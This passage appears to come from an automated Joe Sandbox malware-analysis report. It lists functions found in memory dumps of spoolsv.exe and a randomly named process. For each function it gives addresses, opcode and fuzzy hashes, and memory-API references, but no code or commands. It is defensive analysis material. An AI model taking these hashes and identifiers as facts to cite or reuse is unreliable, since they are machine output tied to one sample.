Opcode ID: 8d007713637322fcd2370dab907826f6c63b4e47f005a2136d7ab3ec3bbf1833
Instruction ID: 1f41615c1f8a249bb06937d9b1f2194a51c2edc98ee4f81794169c10711114ec
Opcode Fuzzy Hash: 8d007713637322fcd2370dab907826f6c63b4e47f005a2136d7ab3ec3bbf1833
Instruction Fuzzy Hash: 0B012B2198E6C51FE76957B04CB19B13FA0CF9721070E06FAD08DCB1F3C84D18468351

Function 00007FFD9BAD0C40 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12071a58d7693bf5244cd38438b840945b6ee20e1749e9e118ce6b1d9bfeca74
Instruction ID: ec06b4d4eb2290eb8e3fe28f1047d83cc36d886691b907e0aeb0f6d2d6e881ec
Opcode Fuzzy Hash: 12071a58d7693bf5244cd38438b840945b6ee20e1749e9e118ce6b1d9bfeca74
Instruction Fuzzy Hash: 8C11CB35B0E68C8FE722DBA8886419C7FB0EF82711F4642B7C084DB2A2D9786645C784

Function 00007FFD9BB0E5E7 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 375fc33edde1582660e5dd51bf0e70d0d0821190e14467da5cfd6e470aa6822a
Instruction ID: aff3137387e7843f9e25d29ce11f96479d230aead446fd0aee11e2d4dae996ed
Opcode Fuzzy Hash: 375fc33edde1582660e5dd51bf0e70d0d0821190e14467da5cfd6e470aa6822a
Instruction Fuzzy Hash: A201D832F1451E4BEFA4D5A8E8A57F973E1FF88314F010935D449C31C9DA289A4087C0

Function 00007FFD9BAD2634 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3b80a72452ddc24cc5c1cfd430acbb696b28f18232a712694a743d3718c3663
Instruction ID: 2ca2c4df656dda4fcbcea925104bc53b035b6ddc01fab98a0fa32b7e993cd9fa
Opcode Fuzzy Hash: e3b80a72452ddc24cc5c1cfd430acbb696b28f18232a712694a743d3718c3663
Instruction Fuzzy Hash: B1017121F0D61E0AF7B8A79848753B85182EFD4714F4603B4E45DC62D7CE5D2A018282

Function 00007FFD9BAD0C48 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0a25c288a778abcbdec21e759e99c9fd71142e9784c53efbf377aaf6c41694
Instruction ID: 14f3640aadfc0939459eb39dd5615fab1c588b9a891f561014dd361117e2c801
Opcode Fuzzy Hash: cf0a25c288a778abcbdec21e759e99c9fd71142e9784c53efbf377aaf6c41694
Instruction Fuzzy Hash: 9F019235A0E38D9FD722DB64886419C7FB0EF82711F5642E7D084DB1A2D9786645C740

Function 00007FFD9BAD27F4 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feba646d7ecd0ed23bcc862e10c34e4c3d946be5a326f7f32714caf4bf7cb564
Instruction ID: c66fd7b0f1ac3e6cd38b9ca827f7293d9df4b9da3cb09990b71bda89b76b3a83
Opcode Fuzzy Hash: feba646d7ecd0ed23bcc862e10c34e4c3d946be5a326f7f32714caf4bf7cb564
Instruction Fuzzy Hash: 3F013131E0951E4BEB74EB94C8646F873A1FB94311F1202F9D44ED31B2CDB86E81CA44

Function 00007FFD9BB07CCF Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2878101c6c13eaf170721d0128589f185aabe05558df9a87072f88c5589f8b83
Instruction ID: 0fad02cac06a995e3228569b88ee6fb21abb0323ea26407381c9c3495ad0124d
Opcode Fuzzy Hash: 2878101c6c13eaf170721d0128589f185aabe05558df9a87072f88c5589f8b83
Instruction Fuzzy Hash: 3AF02736B0990C4BD729B97CAC695F43390DF6162A70101BBC08ACF2FAED1995898780

Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74d5dd6a433ae92836656c7edba0532e8b02316e0f1479e1b58954a577f8f826
Instruction ID: 2016b8fd3ed04d1d774f053c52f7f43d132b67bc3f9e6bd9fefc5ae47e119c51
Opcode Fuzzy Hash: 74d5dd6a433ae92836656c7edba0532e8b02316e0f1479e1b58954a577f8f826
Instruction Fuzzy Hash: DC01DF34E0E3CD9FE722DBA4886419C7FB0EF42701F5542E7C084CB2A2D9786A44C740

Function 00007FFD9BAD4381 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbb9cf0b3f40927ec483b97ae016b9638468d16832636d381114544a771cc6f2
Instruction ID: baec9badb8d8c8f1371bc2f51b456492be97a45a6cbf89737345647df441f356
Opcode Fuzzy Hash: cbb9cf0b3f40927ec483b97ae016b9638468d16832636d381114544a771cc6f2
Instruction Fuzzy Hash: 62F0EC34618A088FCB59DF08C8A5EA9B3E1FBAC301F10429DD44AD7260DA34AA84CF85

Function 00007FFD9BAD27CA Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bad0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d5017599dd53eaf80eddef856f74fa36456e6f3c4bfbf8d083df46c44363497
Instruction ID: c1ff82d2735c2b7555deea02a8f5548885d00b22d023e1b91783aa8652329653
Opcode Fuzzy Hash: 5d5017599dd53eaf80eddef856f74fa36456e6f3c4bfbf8d083df46c44363497
Instruction Fuzzy Hash: 4AF03031F0D61D4AEA74E798D4646F82391FBD4711F1242B9D84ED31F2DD686E82CA44

Function 00007FFD9BB0B769 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67c242fc5381ceb4e544e8d09f37d73df94c73a5e36383be9f27c6b229e6e08c
Instruction ID: e183d1a6bbe6b3f1f28ad16419dd4b1b7e5af0edaec9d85add40e11e110cbef4
Opcode Fuzzy Hash: 67c242fc5381ceb4e544e8d09f37d73df94c73a5e36383be9f27c6b229e6e08c
Instruction Fuzzy Hash: C1F0E521B0D7C80FC72A966958650617FF1CB6B11134A02FFD086C72A3ED58EC858341

Function 00007FFD9BB08745 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d95123e579a440c09267f5e2a9d733e729c7539cdd2988ee51ea452457f2a52c
Instruction ID: ce53a0f2e6e7de27d448f5d325f86139fa1bac982c6a3568e8b95ebdbb6c3d1d
Opcode Fuzzy Hash: d95123e579a440c09267f5e2a9d733e729c7539cdd2988ee51ea452457f2a52c
Instruction Fuzzy Hash: F0E0E521B0FA499FD31D1B784C344747B90FF6A21A75B04BAC049CB1FADD15EA498711

Function 00007FFD9BB036F9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a057edd1ce836516d838f0232c40a5414e6a423a8551b7d639d1c971cd141598
Instruction ID: 5371e3cd58c500598c9a4aa2cc190bc3b12afdba892a754d6549a3585732cee5
Opcode Fuzzy Hash: a057edd1ce836516d838f0232c40a5414e6a423a8551b7d639d1c971cd141598
Instruction Fuzzy Hash: 2EE09230609B884FC70EA63988685607BF1EB6721138A42DBC045CB2E3E929DCC9CB41

Function 00007FFD9BAF8818 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baf3000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b1d95e325e08b527b0384e06e5758103d7624c3e6e0e28edf6c22cba4a51da7
Instruction ID: 5347acad8b91c367988ba5a60eba56c0d9b41382dda7141d1ca1429c213f0d94
Opcode Fuzzy Hash: 3b1d95e325e08b527b0384e06e5758103d7624c3e6e0e28edf6c22cba4a51da7
Instruction Fuzzy Hash: 5CE02622F0F64A8EE77543B814782F42FC1DB62260F8401BDC489866E2EC9D08068300

Function 00007FFD9BB0E7B9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24ed0ab58d937348490b51f529878fe683e9b68a4fb4e5466a6b4e3604e5622e
Instruction ID: 23d559e2d9148ff2a9ec07898bbb359b6769986bb7dd83192168461657530563
Opcode Fuzzy Hash: 24ed0ab58d937348490b51f529878fe683e9b68a4fb4e5466a6b4e3604e5622e
Instruction Fuzzy Hash: 1AE08C22A4A7840FC30E56348C698903FB0DF6B21278B00EBD045CF2B3E62DCC89C752

Function 00007FFD9BB01DD4 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a918eee9e6529694c1654ae7afbcb4efddadddf485603811e0380f5cae471f43
Instruction ID: a688f3ce05b001d27497723a64556210fc590c9fb91c04055e6f00ee5557d89c
Opcode Fuzzy Hash: a918eee9e6529694c1654ae7afbcb4efddadddf485603811e0380f5cae471f43
Instruction Fuzzy Hash: 6FE02B3070970E8BE738EB41C860BF53392EB50304F508639D01ACA2DAED7DE985CB40

Function 00007FFD9BAFEB90 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80

Function 00007FFD9BB0B310 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BB0B240 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BB02FD4 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c0e55d26d8fda4b31985d99dd0028199bb9a891b2d874fa57b3ecdee000c1
Instruction ID: 4b98a6faf56b4f609d51b1f1180458bf4044136cc12edde074b88e35a1eb1845
Opcode Fuzzy Hash: fd4c0e55d26d8fda4b31985d99dd0028199bb9a891b2d874fa57b3ecdee000c1
Instruction Fuzzy Hash: 8FE01276F09C1D4FEBE4DE4C806432C33D1FB58774B11026AD45ED3298CA64998687C0

Function 00007FFD9BB086F9 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cdadaaa10a728c8e68deeb9e7dc7e93dd93fb07391bfca7eb0cc4ff7c48876b
Instruction ID: c5d579d83ef8c2d83b86e1fc667caa668565c0bc3b4e48107d1d519ea3b81219
Opcode Fuzzy Hash: 3cdadaaa10a728c8e68deeb9e7dc7e93dd93fb07391bfca7eb0cc4ff7c48876b
Instruction Fuzzy Hash: A9E04F2194E7C04FC70B973488688903F609E2721074A41EAC085CF2B3E52D8C49C712

Function 00007FFD9BAF8820 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9baf3000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9704ce608b8d258fd5f1e58257862e684d6de0b360a4d4b0f3a55c041ad8b946
Instruction ID: 806a8a69cc2e0fcbc8040450d24dbf7a5fbfac37451e1eec04c2bd0b7c5b1f5b
Opcode Fuzzy Hash: 9704ce608b8d258fd5f1e58257862e684d6de0b360a4d4b0f3a55c041ad8b946
Instruction Fuzzy Hash: C7D02B11F1EB4E49FB7493B828A53B42FC2C351270F880178D088C02C5ECCD14518342

Function 00007FFD9BB0E739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae3f31806660ea4e1bd1e7ffca7fc05371f80095f0a4fd873b9e25ec3fe2064
Instruction ID: 84aa1859dd7dbde2bb2a23fd63286c6a22ea5b51a1a94f72597f068eb275ccb5
Opcode Fuzzy Hash: cae3f31806660ea4e1bd1e7ffca7fc05371f80095f0a4fd873b9e25ec3fe2064
Instruction Fuzzy Hash: E4E0B66294F7C44FC74B9B3588B88947F609E6721178B41EBC185CF6B3EA298D49C712

Function 00007FFD9BB028E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9BAE429F Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bae0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f31a9bd3d2283c75912cfbb253588f0250d46e2621d2592066165099bb4b13a
Instruction ID: 9f4c00b1a42dac96cac865910a8e73b60b9794e12b2bf694fc3d903ba1068386
Opcode Fuzzy Hash: 8f31a9bd3d2283c75912cfbb253588f0250d46e2621d2592066165099bb4b13a
Instruction Fuzzy Hash: 73E0CD71F0590D4FF764DF48C8616BD6BB1EF44314F01013AD01DC61D5CE6414434740

Function 00007FFD9BB0C588 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e29a2fe25c48b18fb81fd325854f065f83bea9e5cfd9c6e5fa4c1d756930c93
Instruction ID: 717bb3092781eff3c7c390274609142ef1aefde1fca540bf7daee023cb9eb5cd
Opcode Fuzzy Hash: 9e29a2fe25c48b18fb81fd325854f065f83bea9e5cfd9c6e5fa4c1d756930c93
Instruction Fuzzy Hash: 34D02230B508040FC70CA63888588303390EB6A30678100A8D00AC72B1D96ADC88C780

Function 00007FFD9BB07CC0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8fe9579b1288120b62ecbb6d4d8fba81a26c438e3167d1aa37495394c54546d
Instruction ID: 543d10fe67ed6f5aeb316989d7acbb9e63d2643009a096991f1414b4b630402a
Opcode Fuzzy Hash: f8fe9579b1288120b62ecbb6d4d8fba81a26c438e3167d1aa37495394c54546d
Instruction Fuzzy Hash: 7CD02230B51C040FCB0CAA3C8C588303390EB6A20678100A8E00AC72B5D92ADDC8C740

Function 00007FFD9BAE4A07 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bae0000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caafc75bccc4d626e9344b6f4828711c605ff35942b0ce6db9da6086e27619d0
Instruction ID: 90e36fc0bd9b919a9590d9968f65b32f45581eede3a85ecc17e01ba6db5e12f3
Opcode Fuzzy Hash: caafc75bccc4d626e9344b6f4828711c605ff35942b0ce6db9da6086e27619d0
Instruction Fuzzy Hash: DDD05E24B0D84F4BE675AB9894B127E61A5EF54300F120079D40ED31B6DD68EA42C641

Function 00007FFD9BB009D8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.1996057114.00007FFD9BAFE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ffd9bafe000_spoolsv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cfe4e1cf066234614b4f14f2c29e8dd4853397bdd4f1f189e2ae696730c3566
Instruction ID: 789c74e660ba92418e748de93878a098b43761769a750163e849a27ec97f0333
Opcode Fuzzy Hash: 9cfe4e1cf066234614b4f14f2c29e8dd4853397bdd4f1f189e2ae696730c3566
Instruction Fuzzy Hash: 5CC022B040B2841FEA0062B8481E834BF80EE0223038940FEC04B8B0B3D00C0C008300

Analysis Process: wDyQbcxdSUUjszASb.exePID: 3844, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BAA0D4C Relevance: 1.5, Strings: 1, Instructions: 255
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5[_H, xrefs: 00007FFD9BAA0DF3

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9baa0000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID: 5[_H
API String ID: 0-3279724263
Opcode ID: aa4bd6f7fe10c7d76ed2942dce31dbb3d665cfe1996fe7f6fd7f09f0565aa843
Instruction ID: dd73c43bffb534d7da84f52956cf853b6241e689d300dc144361a86cc5a4a31c
Opcode Fuzzy Hash: aa4bd6f7fe10c7d76ed2942dce31dbb3d665cfe1996fe7f6fd7f09f0565aa843
Instruction Fuzzy Hash: 0C91F576A09A8D4FE759DB6888757A9BFE2FF99310F5001BAD05DDB2E6CB781810C700

Function 00007FFD9BAD187A Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BACE000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9bace000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb6587d5d2ec961719a0c1b905bda59bd8b171d0b5794020e3e313ac0f3414cd
Instruction ID: 70c481ce27aa2f6aea496a5bc625e05117515cec519fc53e5371b7ea52fb2573
Opcode Fuzzy Hash: eb6587d5d2ec961719a0c1b905bda59bd8b171d0b5794020e3e313ac0f3414cd
Instruction Fuzzy Hash: 9DB1A925F2D65E0AE32D8A6848521B573D2EFE2305B16877DD8DFC309BE928E50742C1

Function 00007FFD9BAA0E43 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9baa0000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f723bb5d5db314043bc226cca6ab486bc97337a761c317ee5811e4cd74a852
Instruction ID: 80e23a21ee9f93f5e99a167d5e35c185d48f36c8688e9efc14863fae3cb9ed07
Opcode Fuzzy Hash: 69f723bb5d5db314043bc226cca6ab486bc97337a761c317ee5811e4cd74a852
Instruction Fuzzy Hash: 6351D37AA1894D4EE7A9CB5C88657A9BFD2EF99324F5001BED01ED73D5CBB81421C700

Function 00007FFD9BAAB32A Relevance: 1.6, APIs: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD9BAAB40D

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BAA7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9baa7000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c8123f5f1db3e1fa5c99097ff47be083d56252095d2c45944fefe1f15a514bbc
Instruction ID: b0f4fa002987ce26a1f24e43b9fc21dd984dc31d86d472521d909b2001dad4ab
Opcode Fuzzy Hash: c8123f5f1db3e1fa5c99097ff47be083d56252095d2c45944fefe1f15a514bbc
Instruction Fuzzy Hash: 7741193190D7884FD719DBA89C166E9BFE1EF56321F0443AFD089D31A2CA746406C792

Function 00007FFD9BAAC211 Relevance: 1.5, APIs: 1, Instructions: 221
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BAA7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9baa7000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9cdcfd03a82f095ea3b70036a854b8d30199aca7ff1b9dd5366281ca5e622e
Instruction ID: 2d97c7269427282f29774971a92a7dbeb79aa2f18321599cf587b1a866076582
Opcode Fuzzy Hash: 7a9cdcfd03a82f095ea3b70036a854b8d30199aca7ff1b9dd5366281ca5e622e
Instruction Fuzzy Hash: 53513D31B0DA4C0FE758A76C98566B9B7E1EB99320F00017EE04DC32A3DD64AC468791

Function 00007FFD9BAAC301 Relevance: 1.4, APIs: 1, Instructions: 126
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FFD9BAAC3B4

Memory Dump Source

Source File: 0000001C.00000002.1991638526.00007FFD9BAA7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffd9baa7000_wDyQbcxdSUUjszASb.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 95573ab360fb2a4e20ffea7f26c8fbf8168d512b1bc71f0997a1af6104bde4f3
